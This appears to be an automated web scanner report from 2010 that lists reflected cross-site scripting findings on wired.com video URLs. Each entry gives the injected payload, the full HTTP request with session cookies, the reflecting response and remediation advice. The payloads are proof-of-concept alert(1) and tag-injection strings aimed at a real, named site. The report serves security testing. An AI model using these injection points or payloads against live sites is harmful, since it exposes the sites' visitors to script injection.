The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63b69"><a>216cf93e556 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest63b69"><a>216cf93e556/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:38 GMT Date: Mon, 22 Nov 2010 00:36:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106792
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest63b69"><a>216cf93e556"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 462c0"-alert(1)-"79cf4379b85 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633462c0"-alert(1)-"79cf4379b85/wearable-computers-for-soldiers/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:50 GMT Date: Mon, 22 Nov 2010 00:37:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eaac9"-alert(1)-"b17cb971a9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/wearable-computers-for-soldierseaac9"-alert(1)-"b17cb971a9/660701101001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=285 Expires: Mon, 22 Nov 2010 00:42:49 GMT Date: Mon, 22 Nov 2010 00:38:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106757
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba772"-alert(1)-"71ceb5bac16 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001ba772"-alert(1)-"71ceb5bac16 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:43:13 GMT Date: Mon, 22 Nov 2010 00:38:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f261d"><a>7a7c8bf4dcb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videof261d"><a>7a7c8bf4dcb/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29472 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:58:31 GMT Date: Mon, 22 Nov 2010 00:53:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videof261d"><a>7a7c8bf4dcb ss_making-the-soundtrack-harry-potter-and-the-deathly-hallows c_653378922001"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6728f--><script>alert(1)</script>9c8c6ac13b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video6728f--><script>alert(1)</script>9c8c6ac13b3/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29505 Vary: Accept-Encoding Cache-Control: max-age=280 Expires: Mon, 22 Nov 2010 00:58:56 GMT Date: Mon, 22 Nov 2010 00:54:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video6728f--><script>alert(1)</script>9c8c6ac13b3/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62e15"-alert(1)-"0a8696b2140 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows62e15"-alert(1)-"0a8696b2140/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 01:00:19 GMT Date: Mon, 22 Nov 2010 00:55:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106819
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44987"><a>042fad4950 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows44987"><a>042fad4950/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:20 GMT Date: Mon, 22 Nov 2010 00:54:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106785
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_making-the-soundtrack-harry-potter-and-the-deathly-hallows44987"><a>042fad4950 c_653378922001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 670ef"-alert(1)-"59cf895c586 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001670ef"-alert(1)-"59cf895c586 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=273 Expires: Mon, 22 Nov 2010 01:00:53 GMT Date: Mon, 22 Nov 2010 00:56:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106816
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a470f"><a>013bdc7dab4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001a470f"><a>013bdc7dab4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:00:32 GMT Date: Mon, 22 Nov 2010 00:55:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106805
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_making-the-soundtrack-harry-potter-and-the-deathly-hallows c_653378922001a470f"><a>013bdc7dab4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload c4ed8--><script>alert(1)</script>c2cb6fe8a5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoc4ed8--><script>alert(1)</script>c2cb6fe8a5f/october-madness-meets-sharktoberfest/637752381001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29461 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:00:40 GMT Date: Mon, 22 Nov 2010 00:55:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoc4ed8--><script>alert(1)</script>c2cb6fe8a5f/october-madness-meets-sharktoberfest/637752381001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 171bb"><a>78f80f90327 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video171bb"><a>78f80f90327/october-madness-meets-sharktoberfest/637752381001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29428 Vary: Accept-Encoding Cache-Control: max-age=276 Expires: Mon, 22 Nov 2010 00:58:58 GMT Date: Mon, 22 Nov 2010 00:54:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video171bb"><a>78f80f90327 ss_october-madness-meets-sharktoberfest c_637752381001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96a4f"-alert(1)-"ca9eb5635ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/october-madness-meets-sharktoberfest96a4f"-alert(1)-"ca9eb5635ad/637752381001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:01:32 GMT Date: Mon, 22 Nov 2010 00:56:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106782
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29995"><a>a6225359441 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/october-madness-meets-sharktoberfest29995"><a>a6225359441/637752381001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:00:44 GMT Date: Mon, 22 Nov 2010 00:55:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106743
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_october-madness-meets-sharktoberfest29995"><a>a6225359441 c_637752381001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 784d0"-alert(1)-"229d6c67458 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/october-madness-meets-sharktoberfest/637752381001784d0"-alert(1)-"229d6c67458 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 01:02:10 GMT Date: Mon, 22 Nov 2010 00:57:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e38"><a>f59f5b69106 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/october-madness-meets-sharktoberfest/63775238100181e38"><a>f59f5b69106 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=281 Expires: Mon, 22 Nov 2010 01:01:15 GMT Date: Mon, 22 Nov 2010 00:56:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_october-madness-meets-sharktoberfest c_63775238100181e38"><a>f59f5b69106"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96636"><a>8f845e926ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video96636"><a>8f845e926ab/reddit HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29340 Vary: Accept-Encoding Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:54:17 GMT Date: Mon, 22 Nov 2010 00:49:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video96636"><a>8f845e926ab ss_reddit"> ...[SNIP]...
